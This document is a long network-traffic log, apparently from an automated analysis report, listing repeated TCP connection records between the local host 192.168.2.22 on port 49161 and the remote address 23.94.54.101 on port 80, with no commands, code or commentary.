                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
